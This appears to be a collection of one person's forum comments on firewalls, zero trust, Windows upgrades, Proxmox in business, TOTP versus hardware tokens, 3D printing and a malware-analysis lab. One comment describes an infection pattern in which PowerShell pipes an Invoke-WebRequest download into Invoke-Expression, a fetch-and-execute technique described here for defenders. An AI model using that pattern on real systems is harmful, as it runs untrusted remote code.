Can we follow this up by murdering most of the generic Top Level Domains (gTLD)? I have yet to see anything except spam and malware coming out of the .top domain.
Can we follow this up by murdering most of the generic Top Level Domains (gTLD)? I have yet to see anything except spam and malware coming out of the .top domain.
Ya, absolutely. My point was that, we shouldn’t assume that vendors are doing things right all the time. So, it’s important to have those layered defense, because vendors do stupid stuff like this.
This is a good example of why a zero trust network architecture is important. This attack would require the attacker to be able to SSH to the management interface of the device. Done right, that interface will be on a VLAN which has very limited access (e.g. specific IPs or a jumphost). While that isn’t an impossible hurdle for an attacker to overcome, it’s significantly harder than just popping any box on the network. People make mistakes all the time, and someone on your network is going to fall for a phishing attack or malicious redirect or any number of things. Having that extra layer, before they pop the firewall, gives defenders that much more time to notice, find and evict the attacker.
Also, Whiskey, Tango, Foxtrot Cisco?
This article brought to you by the manufacturers of the interceptor missiles.
If we were actually in a hot war or expecting one very soon, yes we would want to ramp production like the US did during WWII. Right now, the excessive costs of wartime production should not be considered. It’s always best to remember Eisenhower’s words:
Every gun that is made, every warship launched, every rocket fired signifies, in the final sense, a theft from those who hunger and are not fed, those who are cold and are not clothed. This world in arms is not spending money alone. It is spending the sweat of its laborers, the genius of its scientists, the hopes of its children. The cost of one modern heavy bomber is this: a modern brick school in more than 30 cities. It is two electric power plants, each serving a town of 60,000 population. It is two fine, fully equipped hospitals. It is some fifty miles of concrete pavement. We pay for a single fighter with a half-million bushels of wheat. We pay for a single destroyer with new homes that could have housed more than 8,000 people. . . . This is not a way of life at all, in any true sense. Under the cloud of threatening war, it is humanity hanging from a cross of iron.
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest
piping the download into an Invoke-Expression
(usually the shorter iex
alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
Ya, in fairness to MS, Windows XP was a good release (post SP1, like most “good” MS releases). But, the fact is that MS is going to push the latest version, regardless of how ready it is for use. MS was hot for folks to switch to Windows ME. And holy fuck was that a terrible OS. MS also did everything short of bribery to get folks to switch to Vista (anyone remember Windows Mojave?). The “upgrade, or else” mantra has always been their way. Not that I blame them too much, it does need to happen. It just sucks when the reason for the new OS is more intrusive ads and user tracking.
Many years ago, I attended a Windows XP launch event. The Microsoft presenter had the perfect line to describe how MS views this:
“Why should you upgrade to Windows XP? Because we’re going to stop supporting Windows 98!”
This was said completely unironically and with the expectation that people would just do what MS wanted them to do. That attitude hasn’t changed in the years since. Win 10 is going to be left behind. You will either upgrade or be vulnerable. Also, MS doesn’t care about the home users, they care about the businesses and the money to be had. And businesses will upgrade. They will invariably wait to the last minute and then scramble to get it done. But, whether because they actually give a shit about security or they have to comply with security frameworks (SOX, HIPAA, etc.), they will upgrade. Sure, they will insist on GPOs to disable 90% of the Ads and tracking shit, but they will upgrade.
Gaming under Linux is getting better and better. With all the work Valve has put into Proton, the list of games which don’t run has been shrinking.
WeChat’s software has security issues? Color me shocked. Shocked, I tell you.
Well, not that shocked.
Also:
WeChat’s custom encryption protocol
I’ve been using Proxmox professionally for years now, and not once did i have s problem i could not fix myself.
And how many of the environments you have left behind became an unmanageable mess when the company couldn’t hire someone with your skillset? One of the downsides to this sort of DIY infrastructure is that it creates a major dependency on a specific skillset. That isn’t always bad, but it does create a risk which business continuity planning must take into account. This is why things like OpenShift or even VMWare tend to exist (and be expensive). If your wunderkind admin leaves for greener pastures, your infrastructure isn’t at risk if you cannot hire another one. The major, paid for, options tend to have support you can reach out to and you are more likely to find admins who can maintain them. It sucks, because it means that the big products stay big, because they are big. But, the reality of a business is that continuity in the face of staff turnover is worth the licensing costs.
This line, from the OP’s post, is kind of telling as to why many businesses choose not to run Proxmox in production:
It is just KVM libvirt/qemu and corosync along with some other stuff like ZFS.
Sure, none of those technologies are magic; but, when one of them decides to fuck off for the day, if your admin isn’t really knowledgeable about all of them and how they interact, the business is looking at serious downtime. Hell, my current employer is facing this right now with a Graylog infrastructure. Someone set it up, and it worked quite well, a lot of years ago. That person left the company and no one else had the knowledge, skills or time to maintain it. Now that my team (Security) is actually asking questions about the logs its supposed to provide, we realize that the neglect is causing problems and no one knows what to do with it. Our solution? Ya, we’re moving all of that logging into Splunk. And boy howdy is that going to cost a lot. But, it means that we actually have the logs we need, when we need them (Security tends to be pissy about that sort of thing). And we’re not reliant on always having someone with Graylog knowledge. Sure, we always need someone with Splunk knowledge. But, that’s a much easier ask. Splunk admins are much more common and probably cheaper. We’re also a large enough customer that we have a dedicated rep from Splunk whom we can email with a “halp, it fell over and we can’t get it up” and have Splunk engineers on the line in short order. That alone is worth the cost.
It’s not that I don’t think that Proxmox or Open Source Software (OSS) has a place in an enterprise environment. One of my current projects is all about Linux on the desktop (IT is so not getting the test laptop back. It’s mine now, this is what I’m going to use for work.). But, using OSS often carries special risks which the business needs to take into account. And when faced with those risks, the RoI may just not be there for using OSS. Because, when the numbers get run, having software which can be maintained by those Windows admins who are “used to click their way though things” might just be cheaper in the long run.
So ya, I agree with the OP. Proxmox is a cool option. And for some businesses, it will make financial sense to take on the risks of running a special snowflake infrastructure for VMs. But, for a lot of businesses, the risks of being very reliant on that one person who “not once [had a] problem i could not fix myself”, just isn’t going to be worth taking.
What is your tolerance for tinkering? One option, which would give you a lot of control and flexibility over the printer would be to build a Voron. It’s tough to get more “open source” than a fully open source design. The 2.4 is also a CoreXY design and should cover just about everything you want.
Pretty sure that BambuLabs is misses on the requirement:
I want something as open source as possible that doesn’t phone home, and ideally not made in China.
Someone is trying to re-create the virus from Snow Crash
The Company believes the unauthorized actor exfiltrated certain encrypted internal ADT data associated with employee user accounts during the intrusion. Based on its investigation to date, the Company does not believe customers’ personal information has been exfiltrated, or that customers’ security systems have been compromised. ADT’s containment measures have resulted in some disruptions to the Company’s information systems, and the Company’s investigation is at an early stage and ongoing.
This reads a lot like a domain controller got popped. Considering that this is the second breach in a short time, and the previous one got access to customer data, I wouldn’t be surprised to find out that it’s either the same attacker or this breach was an access broker who sold credentials to the previous attacker.
That’s just my guess, and I doubt we will ever get a sufficiently detailed write-up to know. But, it seems like a likely way for the attacks to go down.
Probably worth noting that, if you are using an employer owned system to watch said porn, they likely have software on the endpoint which will let them see what porn you are watching, regardless of HTTPS/VPN/Tor. Depending on how much your employer cares about such things, that may or may not come back to bite you. I’ve worked at places where we regularly reported on users watching porn on work computers, and I’ve worked at places where we only reported on users getting malware while browsing porn at work. But, never assume your activity isn’t being monitored on employer owned systems.
Aren’t they inherently less secure than a TOTP code?
They can be, depending on the types of threats you expect to face. If physical theft is an expected threat, then a hardware token runs the risk of being stolen and abused. For example, your attackers might just buy off cops to rob you and take your stuff. Having the physical device locked with a PIN/Passcode can mitigate this threat somewhat. But, that just becomes another password the attackers need to figure out.
On the other side of the coin, TOTP applications have started offering Cloud Backup options for accounts. What this demonstrates is that it’s possible to move those accounts between devices remotely. A hacked device means those codes may be exfiltrated to an attackers device and you will be none the wiser. Good security hygiene and device hardening can help mitigate these issues. But, it also means you need to a lot of trust in a lot of third parties. Also, you need to be unimportant enough for an attacker to not burn a 0-day on.
Ultimately, security is all about trade-offs. If you worry about physical security and don’t expect to face a threat which might compromise your phone, then a TOTP app might be a better option. If you are more worried about a hacked device being used to leak credentials, then a physical token may be a better choice. Each way you go has some ability to mitigate the risks. PIN for a physical token and device hardening for TOTP. But, neither is a silver bullet.
And, if your threat model includes someone willing and able to engage in rubber hose cryptanalysis, then you’re probably fucked anyway.
I’ve heard that in the US, the 5th amendment protects you from being forced to divulge a password, but they can physically place your finger on the finger print scanner.
Ya, it’s a weird space that you cannot be legally forced to divulge a password, except in cases where the content of the drive is a “foregone conclusion” (as defined by the US Supreme Court). But, they can absolutely collect biometric markers (including forcing a fingerprint scan).
As far as the rest of it, it seems to be happening with every filament I slice in Prusa slicer.
This just reminded me of an issue I was facing recently. I also use Prusa Slicer and was having a hell of a time with my prints. It turned out to be the “Arc Fitting” setting.
In Print Settings - Advanced - Slicing look for the *Arc Fitting setting. When I had it set to “Enabled: G2/3IJ” it just completely borked my prints. Just weird problems all over the place. As soon as I set that to “Disabled”, it cleaned up my prints considerably. Not sure exactly what I’m giving up there, but I do know I’m getting much better prints.
If you haven’t yet, try a cold pull and see if that helps. I personally just do a cold pull every time I change filaments. Maybe it helps, maybe it’s overkill, but I rarely have issues around clogs.
Other things to think about:
writes Nestler. “We want to hear from you when you think Reddit is making decisions that are not in your communities’ best interests. But if a protest crosses the line into harming redditors and Reddit, we’ll step in.”
Translation: We don’t really give a shit what you think. Now shut up and generate that content for us to sell to AI companies.
This could just be a really stupid format, put out by a specific application for creating PDFs, because the original authors didn’t want to pay Adobe (never attribute to malice, that which can be sufficiently explained with stupidity).
Does pdfinfo give any indication of the application used to create the document? If it chokes on the Java bit up front, can you extract just the PDF from the file and look at that? You might also dig through the PDF a bit using Dider Stevens 's Tools, looking for JavaScript or other indicators of PDF fuckery.
Does the file contain any other Java bytecode? If so, can you pass that through a decompiler?
This is possible, but it takes a bit of setup. In my own lab, I have PolarProxy running in one Virtual Machine (VM), using QEMU/KVM. That acts as a gateway between an isolated network and a network with internet access. It runs transparent TLS break and inspect on port 443/tcp and tcpdump capturing port 80/tcp. It also serves DNS using Bind.
There is then the “victim” VM which is running bog standard Windows 10. The PolarProxy root cert has been added to the Trusted Roots certificate store. The Default Gateway and DNS servers are hard coded to the PolarProxy VM. Suspicious stuff is tested on this system and all network traffic is recorded on the PolarProxy system in standard pcap format for analysis.